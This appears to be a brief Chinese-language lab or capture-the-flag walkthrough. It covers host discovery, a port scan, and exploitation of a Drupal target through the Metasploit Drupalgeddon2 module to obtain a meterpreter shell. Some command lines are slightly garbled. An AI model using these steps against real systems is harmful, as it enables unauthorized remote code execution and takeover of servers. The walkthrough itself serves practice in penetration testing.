一、查找主机ip,通过Nmap扫描工具排查出我的靶机的IP 为.134
python tools.py ip -i 192.168.12.0 -h 254 -l 1
二、扫描其他端口。
1898
三、查看网站漏洞情况,典型的漏洞特征
Ac扫描漏洞情况,利用典型的漏洞。
四、开始getshell
1、启动MSF
msf6 > search SA-CORE-2018-002 #查询漏洞特征模块
可以看到,有可以利用的漏洞模块。直接开搞
2、使用对应的漏洞模块
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
3、查看并调整参数。调整参数
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
五、拿下!
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
meterpreter > shellls
查看系统版本。
为所欲为~~~